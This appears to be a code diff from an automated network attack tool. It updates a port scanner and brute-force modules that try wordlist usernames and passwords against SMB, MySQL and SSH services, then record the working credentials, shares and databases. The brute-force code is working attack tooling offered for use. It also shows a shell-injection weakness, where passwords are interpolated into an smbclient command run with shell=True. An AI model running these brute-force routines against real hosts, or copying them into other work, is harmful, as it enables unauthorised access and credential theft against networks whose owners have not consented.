if idx % 10 == 0 or idx == total_targets: if idx % 10 == 0 or idx == total_targets:
found = sum(len(v) for v in self.open_ports.values()) found = sum(len(v) for v in self.open_ports.values())
self.outer.logger.info( self.outer.logger.info(
@@ -517,13 +619,27 @@ class NetworkScanner:
# ---------- orchestration ---------- # ---------- orchestration ----------
def scan(self): def scan(self):
self.shared_data.orchestrator_should_exit = False # Reset only local stop flag for this action. Never touch orchestrator_should_exit here.
self._stop_event.clear()
try: try:
if self.shared_data.orchestrator_should_exit: if self._should_stop():
self.logger.info("Orchestrator switched to manual mode. Stopping scanner.") self.logger.info("Orchestrator switched to manual mode. Stopping scanner.")
return return
now = time.time()
elapsed = now - self._last_scan_started if self._last_scan_started else 1e9
if elapsed < self.scan_min_interval_s:
remaining = int(self.scan_min_interval_s - elapsed)
self.logger.info_throttled(
f"Network scan skipped (min interval active, remaining={remaining}s)",
key="scanner_min_interval_skip",
interval_s=15.0,
)
return
self._last_scan_started = now
self.shared_data.bjorn_orch_status = "NetworkScanner" self.shared_data.bjorn_orch_status = "NetworkScanner"
self.shared_data.comment_params = {}
self.logger.info("Starting Network Scanner") self.logger.info("Starting Network Scanner")
# network # network
@@ -535,6 +651,7 @@ class NetworkScanner:
return return
self.shared_data.bjorn_status_text2 = str(network) self.shared_data.bjorn_status_text2 = str(network)
self.shared_data.comment_params = {"network": str(network)}
portstart = int(self.shared_data.portstart) portstart = int(self.shared_data.portstart)
portend = int(self.shared_data.portend) portend = int(self.shared_data.portend)
extra_ports = self.shared_data.portlist extra_ports = self.shared_data.portlist
@@ -547,21 +664,22 @@ class NetworkScanner:
ip_data, open_ports_by_ip, all_ports, alive_macs = result ip_data, open_ports_by_ip, all_ports, alive_macs = result
if self.shared_data.orchestrator_should_exit: if self._should_stop():
self.logger.info("Scan canceled before DB finalization.") self.logger.info("Scan canceled before DB finalization.")
return return
# push ports -> DB (merge by MAC). Only for IPs with known MAC. # push ports -> DB (merge by MAC)
# map ip->mac
ip_to_mac = {ip: mac for ip, _, mac in zip(ip_data.ip_list, ip_data.hostname_list, ip_data.mac_list)} ip_to_mac = {ip: mac for ip, _, mac in zip(ip_data.ip_list, ip_data.hostname_list, ip_data.mac_list)}
# existing cache try:
existing_map = {h['mac_address']: h for h in self.shared_data.db.get_all_hosts()} existing_map = {h['mac_address']: h for h in self.shared_data.db.get_all_hosts()}
except Exception as e:
self.logger.error(f"DB get_all_hosts for port merge failed: {e}")
existing_map = {}
for ip, ports in open_ports_by_ip.items(): for ip, ports in open_ports_by_ip.items():
mac = ip_to_mac.get(ip) mac = ip_to_mac.get(ip)
if not mac: if not mac:
# store to pending (no DB write)
slot = scanner.pending.setdefault( slot = scanner.pending.setdefault(
ip, ip,
{'hostnames': set(), 'ports': set(), 'first_seen': int(time.time()), 'essid': scanner.essid} {'hostnames': set(), 'ports': set(), 'first_seen': int(time.time()), 'essid': scanner.essid}
@@ -578,16 +696,19 @@ class NetworkScanner:
pass pass
ports_set.update(str(p) for p in (ports or [])) ports_set.update(str(p) for p in (ports or []))
self.shared_data.db.update_host( try:
mac_address=mac, self.shared_data.db.update_host(
ports=';'.join(sorted(ports_set, key=lambda x: int(x))), mac_address=mac,
alive=1 ports=';'.join(sorted(ports_set, key=lambda x: int(x))),
) alive=1
)
except Exception as e:
self.logger.error(f"Failed to update ports for {mac}: {e}")
# Late resolution pass: try to resolve pending IPs before stats # Late resolution pass
unresolved_before = len(scanner.pending) unresolved_before = len(scanner.pending)
for ip, data in list(scanner.pending.items()): for ip, data in list(scanner.pending.items()):
if self.shared_data.orchestrator_should_exit: if self._should_stop():
break break
try: try:
guess_hostname = next(iter(data['hostnames']), "") guess_hostname = next(iter(data['hostnames']), "")
@@ -595,25 +716,28 @@ class NetworkScanner:
guess_hostname = "" guess_hostname = ""
mac = self.get_mac_address(ip, guess_hostname) mac = self.get_mac_address(ip, guess_hostname)
if not mac: if not mac:
continue # still unresolved for this run continue
mac = mac.lower() mac = mac.lower()
vendor = self.mac_to_vendor(mac, scanner.vendor_map) vendor = self.mac_to_vendor(mac, scanner.vendor_map)
# create/update host now try:
self.shared_data.db.update_host(
mac_address=mac,
ips=ip,
hostnames=';'.join(data['hostnames']) or None,
vendor=vendor,
essid=data.get('essid'),
alive=1
)
if data['ports']:
self.shared_data.db.update_host( self.shared_data.db.update_host(
mac_address=mac, mac_address=mac,
ports=';'.join(str(p) for p in sorted(data['ports'], key=int)), ips=ip,
hostnames=';'.join(data['hostnames']) or None,
vendor=vendor,
essid=data.get('essid'),
alive=1 alive=1
) )
if data['ports']:
self.shared_data.db.update_host(
mac_address=mac,
ports=';'.join(str(p) for p in sorted(data['ports'], key=int)),
alive=1
)
except Exception as e:
self.logger.error(f"Failed to resolve pending IP {ip}: {e}")
continue
del scanner.pending[ip] del scanner.pending[ip]
if scanner.pending: if scanner.pending:
@@ -622,8 +746,13 @@ class NetworkScanner:
f"(resolved during late pass: {unresolved_before - len(scanner.pending)})" f"(resolved during late pass: {unresolved_before - len(scanner.pending)})"
) )
# stats (alive, total ports, distinct vulnerabilities on alive) # stats
rows = self.shared_data.db.get_all_hosts() try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
self.logger.error(f"DB get_all_hosts for stats failed: {e}")
rows = []
alive_hosts = [r for r in rows if int(r.get('alive') or 0) == 1] alive_hosts = [r for r in rows if int(r.get('alive') or 0) == 1]
all_known = len(rows) all_known = len(rows)
@@ -641,12 +770,23 @@ class NetworkScanner:
except Exception: except Exception:
vulnerabilities_count = 0 vulnerabilities_count = 0
self.shared_data.db.set_stats( try:
total_open_ports=total_open_ports, self.shared_data.db.set_stats(
alive_hosts_count=len(alive_hosts), total_open_ports=total_open_ports,
all_known_hosts_count=all_known, alive_hosts_count=len(alive_hosts),
vulnerabilities_count=int(vulnerabilities_count) all_known_hosts_count=all_known,
) vulnerabilities_count=int(vulnerabilities_count)
)
except Exception as e:
self.logger.error(f"Failed to set stats: {e}")
# Update comment params with final stats
self.shared_data.comment_params = {
"alive_hosts": str(len(alive_hosts)),
"total_ports": str(total_open_ports),
"vulns": str(int(vulnerabilities_count)),
"network": str(network)
}
# WAL checkpoint + optimize # WAL checkpoint + optimize
try: try:
@@ -661,7 +801,7 @@ class NetworkScanner:
self.logger.info("Network scan complete (DB updated).") self.logger.info("Network scan complete (DB updated).")
except Exception as e: except Exception as e:
if self.shared_data.orchestrator_should_exit: if self._should_stop():
self.logger.info("Orchestrator switched to manual mode. Gracefully stopping the network scanner.") self.logger.info("Orchestrator switched to manual mode. Gracefully stopping the network scanner.")
else: else:
self.logger.error(f"Error in scan: {e}") self.logger.error(f"Error in scan: {e}")
@@ -673,7 +813,9 @@ class NetworkScanner:
def start(self): def start(self):
if not self.running: if not self.running:
self.running = True self.running = True
self.thread = threading.Thread(target=self.scan_wrapper, daemon=True) self._stop_event.clear()
# Non-daemon so orchestrator can join it reliably (no orphan thread).
self.thread = threading.Thread(target=self.scan_wrapper, daemon=False)
self.thread.start() self.thread.start()
logger.info("NetworkScanner started.") logger.info("NetworkScanner started.")
@@ -683,25 +825,22 @@ class NetworkScanner:
finally: finally:
with self.lock: with self.lock:
self.shared_data.bjorn_progress = "" self.shared_data.bjorn_progress = ""
self.running = False
logger.debug("bjorn_progress reset to empty string") logger.debug("bjorn_progress reset to empty string")
def stop(self): def stop(self):
if self.running: if self.running:
self.running = False self.running = False
self.shared_data.orchestrator_should_exit = True self._stop_event.set()
try: try:
if hasattr(self, "thread") and self.thread.is_alive(): if hasattr(self, "thread") and self.thread.is_alive():
self.thread.join() self.thread.join(timeout=15)
except Exception: except Exception:
pass pass
logger.info("NetworkScanner stopped.") logger.info("NetworkScanner stopped.")
if __name__ == "__main__": if __name__ == "__main__":
# SharedData must provide .db (BjornDatabase) and fields:
# default_network_interface, use_custom_network, custom_network,
# portstart, portend, portlist, blacklistcheck, mac/ip/hostname blacklists,
# bjorn_progress, bjorn_orch_status, bjorn_status_text2, orchestrator_should_exit.
from shared import SharedData from shared import SharedData
sd = SharedData() sd = SharedData()
scanner = NetworkScanner(sd) scanner = NetworkScanner(sd)

View File

@@ -1,8 +1,8 @@
""" """
smb_bruteforce.py SMB bruteforce (DB-backed, no CSV/JSON, no rich) smb_bruteforce.py — SMB bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles fournies par lorchestrateur (ip, port) - Cibles fournies par l’orchestrateur (ip, port)
- IP -> (MAC, hostname) depuis DB.hosts - IP -> (MAC, hostname) depuis DB.hosts
- Succès enregistrés dans DB.creds (service='smb'), 1 ligne PAR PARTAGE (database=<share>) - Succès enregistrés dans DB.creds (service='smb'), 1 ligne PAR PARTAGE (database=<share>)
- Conserve la logique de queue/threads et les signatures. Plus de rich/progress. - Conserve la logique de queue/threads et les signatures. Plus de rich/progress.
""" """
@@ -10,12 +10,13 @@ import os
import threading import threading
import logging import logging
import time import time
from subprocess import Popen, PIPE from subprocess import Popen, PIPE, TimeoutExpired
from smb.SMBConnection import SMBConnection from smb.SMBConnection import SMBConnection
from queue import Queue from queue import Queue
from typing import List, Dict, Tuple, Optional from typing import List, Dict, Tuple, Optional
from shared import SharedData from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger from logger import Logger
logger = Logger(name="smb_bruteforce.py", level=logging.DEBUG) logger = Logger(name="smb_bruteforce.py", level=logging.DEBUG)
@@ -47,19 +48,20 @@ class SMBBruteforce:
return self.smb_bruteforce.run_bruteforce(ip, port) return self.smb_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key): def execute(self, ip, port, row, status_key):
"""Point dentrée orchestrateur (retour 'success' / 'failed').""" """Point d'entrée orchestrateur (retour 'success' / 'failed')."""
self.shared_data.bjorn_orch_status = "SMBBruteforce" self.shared_data.bjorn_orch_status = "SMBBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
success, results = self.bruteforce_smb(ip, port) success, results = self.bruteforce_smb(ip, port)
return 'success' if success else 'failed' return 'success' if success else 'failed'
class SMBConnector: class SMBConnector:
"""Gère les tentatives SMB, la persistance DB et le mapping IP(MAC, Hostname).""" """Gère les tentatives SMB, la persistance DB et le mapping IP→(MAC, Hostname)."""
def __init__(self, shared_data): def __init__(self, shared_data):
self.shared_data = shared_data self.shared_data = shared_data
# Wordlists inchangées # Wordlists inchangées
self.users = self._read_lines(shared_data.users_file) self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file) self.passwords = self._read_lines(shared_data.passwords_file)
@@ -70,6 +72,7 @@ class SMBConnector:
self.lock = threading.Lock() self.lock = threading.Lock()
self.results: List[List[str]] = [] # [mac, ip, hostname, share, user, password, port] self.results: List[List[str]] = [] # [mac, ip, hostname, share, user, password, port]
self.queue = Queue() self.queue = Queue()
self.progress = None
# ---------- util fichiers ---------- # ---------- util fichiers ----------
@staticmethod @staticmethod
@@ -115,8 +118,9 @@ class SMBConnector:
# ---------- SMB ---------- # ---------- SMB ----------
def smb_connect(self, adresse_ip: str, user: str, password: str) -> List[str]: def smb_connect(self, adresse_ip: str, user: str, password: str) -> List[str]:
conn = SMBConnection(user, password, "Bjorn", "Target", use_ntlm_v2=True) conn = SMBConnection(user, password, "Bjorn", "Target", use_ntlm_v2=True)
timeout = int(getattr(self.shared_data, "smb_connect_timeout_s", 6))
try: try:
conn.connect(adresse_ip, 445) conn.connect(adresse_ip, 445, timeout=timeout)
shares = conn.listShares() shares = conn.listShares()
accessible = [] accessible = []
for share in shares: for share in shares:
@@ -127,7 +131,7 @@ class SMBConnector:
accessible.append(share.name) accessible.append(share.name)
logger.info(f"Access to share {share.name} successful on {adresse_ip} with user '{user}'") logger.info(f"Access to share {share.name} successful on {adresse_ip} with user '{user}'")
except Exception as e: except Exception as e:
logger.error(f"Error accessing share {share.name} on {adresse_ip} with user '{user}': {e}") logger.debug(f"Error accessing share {share.name} on {adresse_ip} with user '{user}': {e}")
try: try:
conn.close() conn.close()
except Exception: except Exception:
@@ -137,10 +141,22 @@ class SMBConnector:
return [] return []
def smbclient_l(self, adresse_ip: str, user: str, password: str) -> List[str]: def smbclient_l(self, adresse_ip: str, user: str, password: str) -> List[str]:
timeout = int(getattr(self.shared_data, "smb_connect_timeout_s", 6))
cmd = f'smbclient -L {adresse_ip} -U {user}%{password}' cmd = f'smbclient -L {adresse_ip} -U {user}%{password}'
process = None
try: try:
process = Popen(cmd, shell=True, stdout=PIPE, stderr=PIPE) process = Popen(cmd, shell=True, stdout=PIPE, stderr=PIPE)
stdout, stderr = process.communicate() try:
stdout, stderr = process.communicate(timeout=timeout)
except TimeoutExpired:
try:
process.kill()
except Exception:
pass
try:
stdout, stderr = process.communicate(timeout=2)
except Exception:
stdout, stderr = b"", b""
if b"Sharename" in stdout: if b"Sharename" in stdout:
logger.info(f"Successful auth for {adresse_ip} with '{user}' using smbclient -L") logger.info(f"Successful auth for {adresse_ip} with '{user}' using smbclient -L")
return self.parse_shares(stdout.decode(errors="ignore")) return self.parse_shares(stdout.decode(errors="ignore"))
@@ -150,6 +166,23 @@ class SMBConnector:
except Exception as e: except Exception as e:
logger.error(f"Error executing '{cmd}': {e}") logger.error(f"Error executing '{cmd}': {e}")
return [] return []
finally:
if process:
try:
if process.poll() is None:
process.kill()
except Exception:
pass
try:
if process.stdout:
process.stdout.close()
except Exception:
pass
try:
if process.stderr:
process.stderr.close()
except Exception:
pass
@staticmethod @staticmethod
def parse_shares(smbclient_output: str) -> List[str]: def parse_shares(smbclient_output: str) -> List[str]:
@@ -216,10 +249,13 @@ class SMBConnector:
continue continue
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port]) self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Share:{share}") logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Share:{share}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port), "share": shares[0] if shares else ""}
self.save_results() self.save_results()
self.removeduplicates() self.removeduplicates()
success_flag[0] = True success_flag[0] = True
finally: finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done() self.queue.task_done()
# Optional delay between attempts # Optional delay between attempts
@@ -228,69 +264,82 @@ class SMBConnector:
def run_bruteforce(self, adresse_ip: str, port: int): def run_bruteforce(self, adresse_ip: str, port: int):
self.results = []
mac_address = self.mac_for_ip(adresse_ip) mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or "" hostname = self.hostname_for_ip(adresse_ip) or ""
total_tasks = len(self.users) * len(self.passwords) dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords) + len(dict_passwords))
if total_tasks == 0: if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.") logger.warning("No users/passwords loaded. Abort.")
return False, [] return False, []
for user in self.users: self.progress = ProgressTracker(self.shared_data, total_tasks)
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False] success_flag = [False]
threads = []
thread_count = min(40, max(1, total_tasks))
for _ in range(thread_count): def run_primary_phase(passwords):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True) phase_tasks = len(self.users) * len(passwords)
t.start() if phase_tasks == 0:
threads.append(t) return
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
try:
self.queue.get_nowait()
self.queue.task_done()
except Exception:
break
break
self.queue.join()
for t in threads:
t.join()
# Fallback smbclient -L si rien trouvé
if not success_flag[0]:
logger.info(f"No success via SMBConnection. Trying smbclient -L for {adresse_ip}")
for user in self.users: for user in self.users:
for password in self.passwords: for password in passwords:
shares = self.smbclient_l(adresse_ip, user, password) if self.shared_data.orchestrator_should_exit:
if shares: logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
with self.lock: return
for share in shares: self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
if share in IGNORED_SHARES:
continue
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"(SMB) Found credentials IP:{adresse_ip} | User:{user} | Share:{share} via smbclient -L")
self.save_results()
self.removeduplicates()
success_flag[0] = True
if getattr(self.shared_data, "timewait_smb", 0) > 0:
time.sleep(self.shared_data.timewait_smb)
return success_flag[0], self.results threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
self.queue.join()
for t in threads:
t.join()
try:
run_primary_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"SMB dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_primary_phase(fallback_passwords)
# Keep smbclient -L fallback on dictionary passwords only (cost control).
if not success_flag[0] and not self.shared_data.orchestrator_should_exit:
logger.info(f"No success via SMBConnection. Trying smbclient -L for {adresse_ip}")
for user in self.users:
for password in dict_passwords:
shares = self.smbclient_l(adresse_ip, user, password)
if self.progress is not None:
self.progress.advance(1)
if shares:
with self.lock:
for share in shares:
if share in IGNORED_SHARES:
continue
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(
f"(SMB) Found credentials IP:{adresse_ip} | User:{user} | Share:{share} via smbclient -L"
)
self.save_results()
self.removeduplicates()
success_flag[0] = True
if getattr(self.shared_data, "timewait_smb", 0) > 0:
time.sleep(self.shared_data.timewait_smb)
self.progress.set_complete()
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
# ---------- persistence DB ---------- # ---------- persistence DB ----------
def save_results(self): def save_results(self):
# insère self.results dans creds (service='smb'), database = <share> # insère self.results dans creds (service='smb'), database = <share>
for mac, ip, hostname, share, user, password, port in self.results: for mac, ip, hostname, share, user, password, port in self.results:
try: try:
self.shared_data.db.insert_cred( self.shared_data.db.insert_cred(
@@ -315,12 +364,12 @@ class SMBConnector:
self.results = [] self.results = []
def removeduplicates(self): def removeduplicates(self):
# plus nécessaire avec l'index unique; conservé pour compat. # plus nécessaire avec l'index unique; conservé pour compat.
pass pass
if __name__ == "__main__": if __name__ == "__main__":
# Mode autonome non utilisé en prod; on laisse simple # Mode autonome non utilisé en prod; on laisse simple
try: try:
sd = SharedData() sd = SharedData()
smb_bruteforce = SMBBruteforce(sd) smb_bruteforce = SMBBruteforce(sd)
@@ -329,3 +378,4 @@ if __name__ == "__main__":
except Exception as e: except Exception as e:
logger.error(f"Error: {e}") logger.error(f"Error: {e}")
exit(1) exit(1)

View File

@@ -1,9 +1,9 @@
""" """
sql_bruteforce.py MySQL bruteforce (DB-backed, no CSV/JSON, no rich) sql_bruteforce.py — MySQL bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles: (ip, port) par lorchestrateur - Cibles: (ip, port) par l’orchestrateur
- IP -> (MAC, hostname) via DB.hosts - IP -> (MAC, hostname) via DB.hosts
- Connexion sans DB puis SHOW DATABASES; une entrée par DB trouvée - Connexion sans DB puis SHOW DATABASES; une entrée par DB trouvée
- Succès -> DB.creds (service='sql', database=<db>) - Succès -> DB.creds (service='sql', database=<db>)
- Conserve la logique (pymysql, queue/threads) - Conserve la logique (pymysql, queue/threads)
""" """
@@ -16,6 +16,7 @@ from queue import Queue
from typing import List, Dict, Tuple, Optional from typing import List, Dict, Tuple, Optional
from shared import SharedData from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger from logger import Logger
logger = Logger(name="sql_bruteforce.py", level=logging.DEBUG) logger = Logger(name="sql_bruteforce.py", level=logging.DEBUG)
@@ -44,18 +45,20 @@ class SQLBruteforce:
return self.sql_bruteforce.run_bruteforce(ip, port) return self.sql_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key): def execute(self, ip, port, row, status_key):
"""Point dentrée orchestrateur (retour 'success' / 'failed').""" """Point d'entrée orchestrateur (retour 'success' / 'failed')."""
self.shared_data.bjorn_orch_status = "SQLBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
success, results = self.bruteforce_sql(ip, port) success, results = self.bruteforce_sql(ip, port)
return 'success' if success else 'failed' return 'success' if success else 'failed'
class SQLConnector: class SQLConnector:
"""Gère les tentatives SQL (MySQL), persistance DB, mapping IP(MAC, Hostname).""" """Gère les tentatives SQL (MySQL), persistance DB, mapping IP→(MAC, Hostname)."""
def __init__(self, shared_data): def __init__(self, shared_data):
self.shared_data = shared_data self.shared_data = shared_data
# Wordlists inchangées # Wordlists inchangées
self.users = self._read_lines(shared_data.users_file) self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file) self.passwords = self._read_lines(shared_data.passwords_file)
@@ -66,6 +69,7 @@ class SQLConnector:
self.lock = threading.Lock() self.lock = threading.Lock()
self.results: List[List[str]] = [] # [ip, user, password, port, database, mac, hostname] self.results: List[List[str]] = [] # [ip, user, password, port, database, mac, hostname]
self.queue = Queue() self.queue = Queue()
self.progress = None
# ---------- util fichiers ---------- # ---------- util fichiers ----------
@staticmethod @staticmethod
@@ -109,16 +113,20 @@ class SQLConnector:
return self._ip_to_identity.get(ip, (None, None))[1] return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- SQL ---------- # ---------- SQL ----------
def sql_connect(self, adresse_ip: str, user: str, password: str): def sql_connect(self, adresse_ip: str, user: str, password: str, port: int = 3306):
""" """
Connexion sans DB puis SHOW DATABASES; retourne (True, [dbs]) ou (False, []). Connexion sans DB puis SHOW DATABASES; retourne (True, [dbs]) ou (False, []).
""" """
timeout = int(getattr(self.shared_data, "sql_connect_timeout_s", 6))
try: try:
conn = pymysql.connect( conn = pymysql.connect(
host=adresse_ip, host=adresse_ip,
user=user, user=user,
password=password, password=password,
port=3306 port=port,
connect_timeout=timeout,
read_timeout=timeout,
write_timeout=timeout,
) )
try: try:
with conn.cursor() as cursor: with conn.cursor() as cursor:
@@ -134,7 +142,7 @@ class SQLConnector:
logger.info(f"Available databases: {', '.join(databases)}") logger.info(f"Available databases: {', '.join(databases)}")
return True, databases return True, databases
except pymysql.Error as e: except pymysql.Error as e:
logger.error(f"Failed to connect to {adresse_ip} with user {user}: {e}") logger.debug(f"Failed to connect to {adresse_ip} with user {user}: {e}")
return False, [] return False, []
# ---------- DB upsert fallback ---------- # ---------- DB upsert fallback ----------
@@ -182,17 +190,20 @@ class SQLConnector:
adresse_ip, user, password, port = self.queue.get() adresse_ip, user, password, port = self.queue.get()
try: try:
success, databases = self.sql_connect(adresse_ip, user, password) success, databases = self.sql_connect(adresse_ip, user, password, port=port)
if success: if success:
with self.lock: with self.lock:
for dbname in databases: for dbname in databases:
self.results.append([adresse_ip, user, password, port, dbname]) self.results.append([adresse_ip, user, password, port, dbname])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Password:{password}") logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Password:{password}")
logger.success(f"Databases found: {', '.join(databases)}") logger.success(f"Databases found: {', '.join(databases)}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port), "databases": str(len(databases))}
self.save_results() self.save_results()
self.remove_duplicates() self.remove_duplicates()
success_flag[0] = True success_flag[0] = True
finally: finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done() self.queue.task_done()
# Optional delay between attempts # Optional delay between attempts
@@ -201,48 +212,56 @@ class SQLConnector:
def run_bruteforce(self, adresse_ip: str, port: int): def run_bruteforce(self, adresse_ip: str, port: int):
total_tasks = len(self.users) * len(self.passwords) self.results = []
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
if total_tasks == 0: if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.") logger.warning("No users/passwords loaded. Abort.")
return False, [] return False, []
for user in self.users: self.progress = ProgressTracker(self.shared_data, total_tasks)
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, port))
success_flag = [False] success_flag = [False]
threads = []
thread_count = min(40, max(1, total_tasks))
for _ in range(thread_count): def run_phase(passwords):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True) phase_tasks = len(self.users) * len(passwords)
t.start() if phase_tasks == 0:
threads.append(t) return
while not self.queue.empty(): for user in self.users:
if self.shared_data.orchestrator_should_exit: for password in passwords:
logger.info("Orchestrator exit signal received, stopping bruteforce.") if self.shared_data.orchestrator_should_exit:
while not self.queue.empty(): logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
try: return
self.queue.get_nowait() self.queue.put((adresse_ip, user, password, port))
self.queue.task_done()
except Exception:
break
break
self.queue.join() threads = []
for t in threads: thread_count = min(8, max(1, phase_tasks))
t.join() for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
logger.info(f"Bruteforcing complete with success status: {success_flag[0]}") self.queue.join()
return success_flag[0], self.results for t in threads:
t.join()
try:
run_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"SQL dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_phase(fallback_passwords)
self.progress.set_complete()
logger.info(f"Bruteforcing complete with success status: {success_flag[0]}")
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
# ---------- persistence DB ---------- # ---------- persistence DB ----------
def save_results(self): def save_results(self):
# pour chaque DB trouvée, créer/mettre à jour une ligne dans creds (service='sql', database=<dbname>) # pour chaque DB trouvée, créer/mettre à jour une ligne dans creds (service='sql', database=<dbname>)
for ip, user, password, port, dbname in self.results: for ip, user, password, port, dbname in self.results:
mac = self.mac_for_ip(ip) mac = self.mac_for_ip(ip)
hostname = self.hostname_for_ip(ip) or "" hostname = self.hostname_for_ip(ip) or ""
@@ -269,7 +288,7 @@ class SQLConnector:
self.results = [] self.results = []
def remove_duplicates(self): def remove_duplicates(self):
# inutile avec lindex unique; conservé pour compat. # inutile avec l’index unique; conservé pour compat.
pass pass
@@ -282,3 +301,4 @@ if __name__ == "__main__":
except Exception as e: except Exception as e:
logger.error(f"Error: {e}") logger.error(f"Error: {e}")
exit(1) exit(1)

View File

@@ -17,9 +17,11 @@ import socket
import threading import threading
import logging import logging
import time import time
from datetime import datetime import datetime
from queue import Queue from queue import Queue
from shared import SharedData from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger from logger import Logger
# Configure the logger # Configure the logger
@@ -38,7 +40,7 @@ b_port = 22
b_service = '["ssh"]' b_service = '["ssh"]'
b_trigger = 'on_any:["on_service:ssh","on_new_port:22"]' b_trigger = 'on_any:["on_service:ssh","on_new_port:22"]'
b_parent = None b_parent = None
b_priority = 70 b_priority = 70 # tu peux ajuster la priorité si besoin
b_cooldown = 1800 # 30 minutes entre deux runs b_cooldown = 1800 # 30 minutes entre deux runs
b_rate_limit = '3/86400' # 3 fois par jour max b_rate_limit = '3/86400' # 3 fois par jour max
@@ -83,6 +85,7 @@ class SSHConnector:
self.lock = threading.Lock() self.lock = threading.Lock()
self.results = [] # List of tuples (mac, ip, hostname, user, password, port) self.results = [] # List of tuples (mac, ip, hostname, user, password, port)
self.queue = Queue() self.queue = Queue()
self.progress = None
# ---- Mapping helpers (DB) ------------------------------------------------ # ---- Mapping helpers (DB) ------------------------------------------------
@@ -134,6 +137,7 @@ class SSHConnector:
"""Attempt to connect to SSH using (user, password).""" """Attempt to connect to SSH using (user, password)."""
ssh = paramiko.SSHClient() ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
timeout = float(getattr(self.shared_data, "ssh_connect_timeout_s", timeout))
try: try:
ssh.connect( ssh.connect(
@@ -244,9 +248,12 @@ class SSHConnector:
self.results.append([mac_address, adresse_ip, hostname, user, password, port]) self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}") logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port)}
success_flag[0] = True success_flag[0] = True
finally: finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done() self.queue.task_done()
# Optional delay between attempts # Optional delay between attempts
@@ -260,48 +267,53 @@ class SSHConnector:
Called by the orchestrator with a single IP + port. Called by the orchestrator with a single IP + port.
Builds the queue (users x passwords) and launches threads. Builds the queue (users x passwords) and launches threads.
""" """
self.results = []
mac_address = self.mac_for_ip(adresse_ip) mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or "" hostname = self.hostname_for_ip(adresse_ip) or ""
total_tasks = len(self.users) * len(self.passwords) dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
if total_tasks == 0: if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.") logger.warning("No users/passwords loaded. Abort.")
return False, [] return False, []
for user in self.users: self.progress = ProgressTracker(self.shared_data, total_tasks)
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
